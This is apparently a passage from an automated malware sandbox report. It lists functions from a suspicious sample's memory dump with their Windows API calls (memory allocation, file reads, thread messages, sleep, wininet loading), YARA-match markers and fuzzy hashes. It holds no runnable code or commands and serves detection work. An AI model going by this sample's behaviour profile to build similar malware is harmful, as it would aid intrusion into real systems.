                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: 701e3baa54f8e2d1500a16ed6031a7d030696d9a7f1944c1d6473eabcbaa2b76
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 6FF0BDB2204208ABCB08CF89DC84EEB77ADAF8C754F158248FA0D97240C630E811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F2883A, Relevance: 1.6, APIs: 1, Instructions: 74memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02F12D11,00002000,00003000,00000004), ref: 02F287F9
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: 6e10bbfe5814aee85482eca774f783ce8ead1bf4672ac8c03b74f48e5f60a76f
                                      • Instruction ID: 52d060d22bc7e0e8db3e9683cb71dab2a8df35e83f7d4d2324ffa815b818037d
                                      • Opcode Fuzzy Hash: 6e10bbfe5814aee85482eca774f783ce8ead1bf4672ac8c03b74f48e5f60a76f
                                      • Instruction Fuzzy Hash: 4F1126B6200218AFDB14EF88DC84EEB77ADEF88790F148559FA1897241C630E914CBB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F28632, Relevance: 1.6, APIs: 1, Instructions: 55filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,02F23BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F23BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02F2862D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: cdbf8246b2d32eeb3f7be1ab4334beb16d648d2fe006f59e8175a92027b2e7b9
                                      • Instruction ID: d757afbe2f0a4c7ecd596764865bd77cad04b4d60b077c2900101774f88a78cf
                                      • Opcode Fuzzy Hash: cdbf8246b2d32eeb3f7be1ab4334beb16d648d2fe006f59e8175a92027b2e7b9
                                      • Instruction Fuzzy Hash: FB0144B6200108AFDB08DF98DD85EEB77AEEF8C654F148249FE4D97240C630E801CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F2868C, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(02F23D72,5E972F65,FFFFFFFF,02F23A31,?,?,02F23D72,?,02F23A31,FFFFFFFF,5E972F65,02F23D72,?,00000000), ref: 02F286D5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 4aead9036738c78546b82a68ddc627b01333e25613207ad84ee075bebe1ce1f1
                                      • Instruction ID: 4bc690b754f8e6a7d0724a7db0723221a6e912f487b817cab074fce2234b82e7
                                      • Opcode Fuzzy Hash: 4aead9036738c78546b82a68ddc627b01333e25613207ad84ee075bebe1ce1f1
                                      • Instruction Fuzzy Hash: D3F0F4B2200108AFDB04CF99DC80EEB77AAAF8C354F118249BA0DD7244C630E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F28690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(02F23D72,5E972F65,FFFFFFFF,02F23A31,?,?,02F23D72,?,02F23A31,FFFFFFFF,5E972F65,02F23D72,?,00000000), ref: 02F286D5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: 9f3a8ce9d5d0bfd2e1fd792b46953fdedcb7ae641f11ac93df114f4e95253abe
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 71F0A4B2200218ABDB14DF89DC84EEB77ADAF8C754F158248BE1D97241D630E911CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F287C0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02F12D11,00002000,00003000,00000004), ref: 02F287F9
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: fdb88fe11a89153a8428005a6bc0aecf625e4ce6066f47e3c055aa72856218c8
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: EEF015B2200218ABDB14DF89CC80EAB77ADAF88750F118148FE0897241C630F910CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F28710, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(02F23D50,?,?,02F23D50,00000000,FFFFFFFF), ref: 02F28735
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: f62a853a107ce3b9ab7459f913f40cca34560af4ec78ce89cac77094df95139b
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: 8BD012752002146BD710EB99CC45E97775DEF44750F154455BA585B241C570F600C6E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F2870B, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(02F23D50,?,?,02F23D50,00000000,FFFFFFFF), ref: 02F28735
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: efe8b76b91f1ba65273ecf2fed5e3118163f63a85d2a39fa944af79593a340db
                                      • Instruction ID: 7a87eb76a64c33f32a6d3c18d729eca122884d4db186855151c7900b7ae09620
                                      • Opcode Fuzzy Hash: efe8b76b91f1ba65273ecf2fed5e3118163f63a85d2a39fa944af79593a340db
                                      • Instruction Fuzzy Hash: 96D02EAD40D2C00BDB10EAB8A8C10827F80EE812587280A8ED8A807203C168E20A9690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 74dbbf65c0f8807c6bce3a1add5fb5179ac1b2b845943a27d8dee9a158b20c12
                                      • Instruction ID: 1f47bcf4c908087ab1a289f7d4d20727a7925d7541bc4ac1d57eb46007cb806a
                                      • Opcode Fuzzy Hash: 74dbbf65c0f8807c6bce3a1add5fb5179ac1b2b845943a27d8dee9a158b20c12
                                      • Instruction Fuzzy Hash: 1790026121184446F610A5694C14B0700459BD4343F51C125A0145554CCA5588617561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7c0d37a5e4278a73724e4d53d40443e79a1fdb16e89ce374e78737f992e39afd
                                      • Instruction ID: c9259f2284185dd02d6b7b9e9c1d5f4d2807931c277d247bc9c740638e5119d2
                                      • Opcode Fuzzy Hash: 7c0d37a5e4278a73724e4d53d40443e79a1fdb16e89ce374e78737f992e39afd
                                      • Instruction Fuzzy Hash: EA9002B120104806F550B159440474600459BD4341F51C021A5055554E87998DD576A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7ccc939d0b31140adb33cee2d21ef71724ebd225d1a87f4eae06de9ac09f632a
                                      • Instruction ID: 4b139668a566c3187901403d6413e67f796ecd8a07900abff1f8dd5b618853e5
                                      • Opcode Fuzzy Hash: 7ccc939d0b31140adb33cee2d21ef71724ebd225d1a87f4eae06de9ac09f632a
                                      • Instruction Fuzzy Hash: D49002A134104846F510A1594414B060045DBE5341F51C025E1055554D8759CC527166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 6d0a6a7acb310ec7a190665bd8c9f86f6f97144ca1d0ef791ff21d32a6a703eb
                                      • Instruction ID: e00ee4f5a2989750e260400931adc2d85cf9f58560eb605a12ec6f196d6699b2
                                      • Opcode Fuzzy Hash: 6d0a6a7acb310ec7a190665bd8c9f86f6f97144ca1d0ef791ff21d32a6a703eb
                                      • Instruction Fuzzy Hash: ED90027120104817F521A159450470700499BD4281F91C422A0415558D97968952B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 89f0c771f7f7860c27f9b311d3578deb8efb2c6f526bf0175d4c15c9ef788004
                                      • Instruction ID: 2a3fe56e6f98d2f99a5a0ad220aa303f09ee3fc32e4500bffc96baca59463233
                                      • Opcode Fuzzy Hash: 89f0c771f7f7860c27f9b311d3578deb8efb2c6f526bf0175d4c15c9ef788004
                                      • Instruction Fuzzy Hash: AE900261242085567955F15944045074046ABE4281791C022A1405950C86669856F661
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b657588bee2ae08c32d1552fbc4f7e25ab8d36ef7008f0e8aa22faeda91ae050
                                      • Instruction ID: 3ed94147959c8bfeff822efa233fccf6aaff572399eb088af6939ac4a97f92c9
                                      • Opcode Fuzzy Hash: b657588bee2ae08c32d1552fbc4f7e25ab8d36ef7008f0e8aa22faeda91ae050
                                      • Instruction Fuzzy Hash: 0890027120104806F510A599540864600459BE4341F51D021A5015555EC7A588917171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 27caf313e9e88b1248ff14ebf9e189ed62ef8fdbe33ecfd8c2567731eabb06b7
                                      • Instruction ID: 968836a356bbc50b6db916cb4da0638f757c1581214a11fc1c687f449b24a314
                                      • Opcode Fuzzy Hash: 27caf313e9e88b1248ff14ebf9e189ed62ef8fdbe33ecfd8c2567731eabb06b7
                                      • Instruction Fuzzy Hash: 2E90027131118806F520A159840470600459BD5241F51C421A0815558D87D588917162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 612be1965258382ffa70403b10132a1e294eebd792e73977c74b720e6bc7d662
                                      • Instruction ID: 247e05d038e035370285974ab3424d2a4d534fd2ce22a3df1cb52e6912df155a
                                      • Opcode Fuzzy Hash: 612be1965258382ffa70403b10132a1e294eebd792e73977c74b720e6bc7d662
                                      • Instruction Fuzzy Hash: 5990026921304406F590B159540860A00459BD5242F91D425A0006558CCA5588697361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c717976e7140832f04c51248ecafc7db837c30df9fb55ad95f13a4f6923f5af1
                                      • Instruction ID: 7998b3169f93fd9ac942240708fc609f768b297fd6a1339528a0f9cd96e2b501
                                      • Opcode Fuzzy Hash: c717976e7140832f04c51248ecafc7db837c30df9fb55ad95f13a4f6923f5af1
                                      • Instruction Fuzzy Hash: C790027120104C06F590B159440464A00459BD5341F91C025A0016654DCB558A5977E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 6b1f70b37f1c40e69d636f508a1b51d66662f9884e630a020f5f378566c289ff
                                      • Instruction ID: e225560b92455b70e5e10ddcb52f900035a30cd0e84fd9bf7d3c32792970f765
                                      • Opcode Fuzzy Hash: 6b1f70b37f1c40e69d636f508a1b51d66662f9884e630a020f5f378566c289ff
                                      • Instruction Fuzzy Hash: 9E90027120508C46F550B1594404A4600559BD4345F51C021A0055694D97658D55B6A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7f65a4436a75d0eda15ea0ca5e5ea60ac0eac79eab942c0ceb567c8982e64a12
                                      • Instruction ID: 7e5b4385a0729efd6822f86bb54fafd2b41ff8d8c9ec69c9803e927b623adc0b
                                      • Opcode Fuzzy Hash: 7f65a4436a75d0eda15ea0ca5e5ea60ac0eac79eab942c0ceb567c8982e64a12
                                      • Instruction Fuzzy Hash: DB9002712010CC06F520A159840474A00459BD4341F55C421A4415658D87D588917161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037696D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 82a581b71b03cac4a9cbcc5b346d6e82e0a8b99fe2501f0e568ee1c29028e94d
                                      • Instruction ID: 355baf8cb4efa10c748964ef7622eb2f8e8a6b732494d7ebc6dbf45c0b60d5ce
                                      • Opcode Fuzzy Hash: 82a581b71b03cac4a9cbcc5b346d6e82e0a8b99fe2501f0e568ee1c29028e94d
                                      • Instruction Fuzzy Hash: 9690027120104C46F510A1594404B4600459BE4341F51C026A0115654D8755C8517561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 03769540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: e0720442bd784a8b498e843d5fff05f9e32eee26da5fac1547c51033d6abb1fc
                                      • Instruction ID: 978d3abd105bf8287130fbf93a76554d132e19837344f6732bee0c1a06d359b4
                                      • Opcode Fuzzy Hash: e0720442bd784a8b498e843d5fff05f9e32eee26da5fac1547c51033d6abb1fc
                                      • Instruction Fuzzy Hash: 67900265211044072515E559070450700869BD9391351C031F1006550CD76188617161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 037695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.557192429.0000000003700000.00000040.00000001.sdmp, Offset: 03700000, based on PE: true
                                      • Associated: 0000000A.00000002.557365149.000000000381B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: d915aeb22f506ae57191ed8c13acee76e656a05fac4a2dfa32d76dec59503f06
                                      • Instruction ID: 7126e903ff9f9f06bb51d2049ea7a63d98c5f8c22c0e6532388a30fa855cf2e2
                                      • Opcode Fuzzy Hash: d915aeb22f506ae57191ed8c13acee76e656a05fac4a2dfa32d76dec59503f06
                                      • Instruction Fuzzy Hash: 479002A1202044076515B1594414616404A9BE4241B51C031E1005590DC66588917165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F17226, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F172DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F172FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID: 3333
                                      • API String ID: 1836367815-2924271548
                                      • Opcode ID: 84e672dca496c63fd72fa7f155115ff7e27a8219a0e5ab1041d2db5ed130d1cc
                                      • Instruction ID: b698eee4d62c603bbde4a9c80d3da6318da48287092409891a4cfb563d9b5914
                                      • Opcode Fuzzy Hash: 84e672dca496c63fd72fa7f155115ff7e27a8219a0e5ab1041d2db5ed130d1cc
                                      • Instruction Fuzzy Hash: 9501DB32A402587BDB28AA949C51FBEB3599F41B60F584119FF09EB180DB94A9064BD1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F27300, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 02F273A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: e437c4b4cce030e79526a53dc8b3352d3d5139c5a698738eee0fd639da684631
                                      • Instruction ID: 026f39352b12d4b2990c8e13b3f2b9aceb81f129dbb57dd8c3b1f766cad87f4e
                                      • Opcode Fuzzy Hash: e437c4b4cce030e79526a53dc8b3352d3d5139c5a698738eee0fd639da684631
                                      • Instruction Fuzzy Hash: 75318FB6A01600ABC715EF64CCA0FA7B7B9AF89740F00811DFA199B241D730A549CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F272F6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 84sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNELBASE(000007D0), ref: 02F273A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: net.dll$wininet.dll
                                      • API String ID: 3472027048-1269752229
                                      • Opcode ID: 2d46a481111c41ab4c42c82e81f8be4fd8097d534c4e8f694f7d5969aee6edc6
                                      • Instruction ID: 5d8264b34d97ad6bc3a13e0d978841c26c00d53b32a0613433827fa388847771
                                      • Opcode Fuzzy Hash: 2d46a481111c41ab4c42c82e81f8be4fd8097d534c4e8f694f7d5969aee6edc6
                                      • Instruction Fuzzy Hash: AC31C5B1A41611ABC711EF64CCA1FABFBB9FF49740F00812DFA199B241D770A549CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F288E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F13B93), ref: 02F2891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 8bd2800df3809b5b47226857547b315c7fb75db21671ffd730d1daaa34049439
                                      • Instruction ID: 3839c330a3c8fa0a8981c4b89ce157c9da788f6f5ead3a353d35024bf3c4c040
                                      • Opcode Fuzzy Hash: 8bd2800df3809b5b47226857547b315c7fb75db21671ffd730d1daaa34049439
                                      • Instruction Fuzzy Hash: 02E068E82081C45BEB11EF78DCD08DB7F91AF822207188589DCD807307C121D51ACF70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F288F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F13B93), ref: 02F2891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: 5ec0e86e73ae40d1fb19e3f79436ab71b35ae1747572cdd4cf9a8a8f328c900d
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: 91E046B1200218ABDB18EF99CC48EA777ADEF88790F118558FE085B241C630F914CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F28876, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F13B93), ref: 02F2891D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 68486664abbb3affa28714beec4584c2163a789fb142b71812b67a33f328043c
                                      • Instruction ID: ddb451bbe59dcfdf36bf1acb55a6059c655fcb7f1607100a77b991e9b304c16d
                                      • Opcode Fuzzy Hash: 68486664abbb3affa28714beec4584c2163a789fb142b71812b67a33f328043c
                                      • Instruction Fuzzy Hash: D8E026B41043459BDB10EF69D880897BBD5FFC1350710860AE84847702C230C82ECB70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 02F17280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F172DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F172FB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Offset: 02F10000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
